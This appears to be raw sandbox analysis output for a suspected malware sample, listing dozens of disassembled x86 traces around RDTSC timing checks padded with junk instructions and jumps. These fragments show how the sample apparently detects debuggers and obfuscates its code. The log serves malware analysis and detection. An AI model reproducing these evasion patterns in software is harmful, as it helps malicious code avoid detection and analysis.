Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74303D7 second address: 743040A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 5911h 0x00000007 pushfd 0x00000008 jmp 00007FAD4CB4B57Eh 0x0000000d add si, 8C68h 0x00000012 jmp 00007FAD4CB4B57Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [eax+18h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743040A second address: 743040E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743040E second address: 7430412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430412 second address: 7430418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430467 second address: 74304B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c jmp 00007FAD4CB4B57Fh 0x00000011 je 00007FADBC8DA79Ch 0x00000017 pushad 0x00000018 mov si, A30Bh 0x0000001c push ecx 0x0000001d call 00007FAD4CB4B587h 0x00000022 pop eax 0x00000023 pop edx 0x00000024 popad 0x00000025 sub eax, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov ecx, ebx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74304B0 second address: 7430512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C006h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAD4CB7BFFDh 0x00000012 xor ecx, 5C5DD416h 0x00000018 jmp 00007FAD4CB7C001h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esi+04h], eax 0x00000022 jmp 00007FAD4CB7BFFEh 0x00000027 mov dword ptr [esi+08h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov di, 1650h 0x00000031 push edi 0x00000032 pop ecx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430512 second address: 7430518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74305C8 second address: 74305CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74305CC second address: 74305E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74305E9 second address: 74305EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74305EF second address: 7430611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B583h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+1Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430611 second address: 7430617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430617 second address: 743062D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edi, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743062D second address: 743065F instructions: 0x00000000 rdtsc 0x00000002 mov ax, FD6Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 mov bx, si 0x0000000c mov ecx, 52D9D9BDh 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esi+20h], eax 0x00000016 pushad 0x00000017 mov dl, 05h 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+60h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FAD4CB7C003h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743065F second address: 74306A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c jmp 00007FAD4CB4B57Eh 0x00000011 mov eax, dword ptr [ebx+64h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAD4CB4B587h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74306A9 second address: 74306E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB7BFFFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+28h], eax 0x00000010 jmp 00007FAD4CB7C004h 0x00000015 mov eax, dword ptr [ebx+68h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74306E0 second address: 74306E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430849 second address: 743084F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430922 second address: 7430928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430928 second address: 743092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743092E second address: 7430932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430932 second address: 7430936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743094A second address: 743094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743094E second address: 7430954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430954 second address: 743095A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743095A second address: 743095E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743095E second address: 7430A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007FAD4CB4B583h 0x0000000f test edi, edi 0x00000011 pushad 0x00000012 push esi 0x00000013 mov edx, 13257166h 0x00000018 pop edx 0x00000019 popad 0x0000001a js 00007FADBC8DA2B3h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FAD4CB4B57Fh 0x00000027 and cl, FFFFFFEEh 0x0000002a jmp 00007FAD4CB4B589h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007FAD4CB4B580h 0x00000036 jmp 00007FAD4CB4B585h 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [ebp-0Ch] 0x00000040 pushad 0x00000041 mov ax, 63F3h 0x00000045 popad 0x00000046 mov dword ptr [esi+04h], eax 0x00000049 jmp 00007FAD4CB4B582h 0x0000004e lea eax, dword ptr [ebx+78h] 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430A09 second address: 7430A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430A26 second address: 7430A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB4B57Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430A36 second address: 7430A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430A3A second address: 7430A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD4CB4B589h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430A61 second address: 7430A67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430A67 second address: 7430A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430A7E second address: 7430A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430A82 second address: 7430A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430A88 second address: 7430AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C004h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430AA7 second address: 7430AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430AAB second address: 7430AB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430AB1 second address: 7430B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E9A8h 0x00000007 mov di, F854h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FAD4CB4B589h 0x00000016 sbb esi, 7901A5C6h 0x0000001c jmp 00007FAD4CB4B581h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FAD4CB4B580h 0x00000028 sbb ax, 7E68h 0x0000002d jmp 00007FAD4CB4B57Bh 0x00000032 popfd 0x00000033 popad 0x00000034 lea eax, dword ptr [ebp-08h] 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov eax, ebx 0x0000003c call 00007FAD4CB4B587h 0x00000041 pop esi 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430B37 second address: 7430B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C006h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAD4CB7BFFDh 0x00000013 sub al, FFFFFF96h 0x00000016 jmp 00007FAD4CB7C001h 0x0000001b popfd 0x0000001c push esi 0x0000001d pop edi 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430BEE second address: 7430C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, CF4Ah 0x00000007 mov bh, 96h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edi, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAD4CB4B589h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430C17 second address: 7430C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430C1D second address: 7430C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B583h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, bx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430C3F second address: 7430C6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C008h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FADBC90AA54h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, 4809BC2Fh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430C6A second address: 7430CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov al, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp-04h] 0x0000000d jmp 00007FAD4CB4B586h 0x00000012 mov dword ptr [esi+08h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FAD4CB4B587h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430CA9 second address: 7430D0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007FAD4CB7BFFEh 0x00000011 push 00000001h 0x00000013 jmp 00007FAD4CB7C000h 0x00000018 nop 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FAD4CB7BFFCh 0x00000022 add eax, 42B38FA8h 0x00000028 jmp 00007FAD4CB7BFFBh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430D0C second address: 7430D41 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FAD4CB4B584h 0x0000000d sub si, 0208h 0x00000012 jmp 00007FAD4CB4B57Bh 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430D41 second address: 7430D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430D53 second address: 7430DA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD4CB4B581h 0x00000009 and esi, 71AC93D6h 0x0000000f jmp 00007FAD4CB4B581h 0x00000014 popfd 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAD4CB4B585h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430DA0 second address: 7430DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430DA6 second address: 7430E21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAD4CB4B57Ah 0x00000008 pop esi 0x00000009 mov bx, 0696h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lea eax, dword ptr [ebp-18h] 0x00000013 jmp 00007FAD4CB4B57Dh 0x00000018 nop 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FAD4CB4B583h 0x00000020 xor ch, FFFFFFCEh 0x00000023 jmp 00007FAD4CB4B589h 0x00000028 popfd 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007FAD4CB4B581h 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FAD4CB4B57Dh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430E36 second address: 7430E3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430E3C second address: 7430E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430E42 second address: 7430E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b call 00007FAD4CB7BFFDh 0x00000010 pushfd 0x00000011 jmp 00007FAD4CB7C000h 0x00000016 sbb esi, 3C831038h 0x0000001c jmp 00007FAD4CB7BFFBh 0x00000021 popfd 0x00000022 pop eax 0x00000023 movsx edx, cx 0x00000026 popad 0x00000027 test edi, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ebx, 4C3F4B80h 0x00000031 push edi 0x00000032 pop ecx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430FAF second address: 7430FE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 call 00007FAD4CB4B580h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov edx, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAD4CB4B583h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430FE3 second address: 7430FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430FE7 second address: 7430FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430FED second address: 7431012 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C004h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, 11616470h 0x00000013 mov bh, 57h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431012 second address: 74310A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAD4CB4B584h 0x00000012 sub eax, 6F7C33E8h 0x00000018 jmp 00007FAD4CB4B57Bh 0x0000001d popfd 0x0000001e call 00007FAD4CB4B588h 0x00000023 pushfd 0x00000024 jmp 00007FAD4CB4B582h 0x00000029 and si, 5178h 0x0000002e jmp 00007FAD4CB4B57Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 mov eax, dword ptr [esi+04h] 0x00000039 jmp 00007FAD4CB4B57Fh 0x0000003e mov dword ptr [edx+04h], eax 0x00000041 pushad 0x00000042 mov si, FABBh 0x00000046 push eax 0x00000047 push edx 0x00000048 mov dx, ax 0x0000004b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74310A8 second address: 7431100 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c mov dx, DCC6h 0x00000010 pushfd 0x00000011 jmp 00007FAD4CB7C007h 0x00000016 or al, 0000004Eh 0x00000019 jmp 00007FAD4CB7C009h 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [edx+08h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FAD4CB7BFFDh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431100 second address: 743111E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743111E second address: 7431131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431131 second address: 7431137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431137 second address: 743113B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743113B second address: 7431166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+0Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAD4CB4B585h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431166 second address: 743116B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743116B second address: 74311D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+10h] 0x0000000a pushad 0x0000000b mov dl, ch 0x0000000d pushfd 0x0000000e jmp 00007FAD4CB4B581h 0x00000013 xor ecx, 7F771A56h 0x00000019 jmp 00007FAD4CB4B581h 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [edx+10h], eax 0x00000023 jmp 00007FAD4CB4B57Eh 0x00000028 mov eax, dword ptr [esi+14h] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007FAD4CB4B57Dh 0x00000033 call 00007FAD4CB4B580h 0x00000038 pop esi 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74311D9 second address: 743127D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C000h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c jmp 00007FAD4CB7C000h 0x00000011 mov eax, dword ptr [esi+18h] 0x00000014 jmp 00007FAD4CB7C000h 0x00000019 mov dword ptr [edx+18h], eax 0x0000001c pushad 0x0000001d mov eax, 159E9FBDh 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FAD4CB7C008h 0x00000029 add si, 42C8h 0x0000002e jmp 00007FAD4CB7BFFBh 0x00000033 popfd 0x00000034 jmp 00007FAD4CB7C008h 0x00000039 popad 0x0000003a popad 0x0000003b mov eax, dword ptr [esi+1Ch] 0x0000003e jmp 00007FAD4CB7C000h 0x00000043 mov dword ptr [edx+1Ch], eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743127D second address: 7431281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7431281 second address: 7431287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
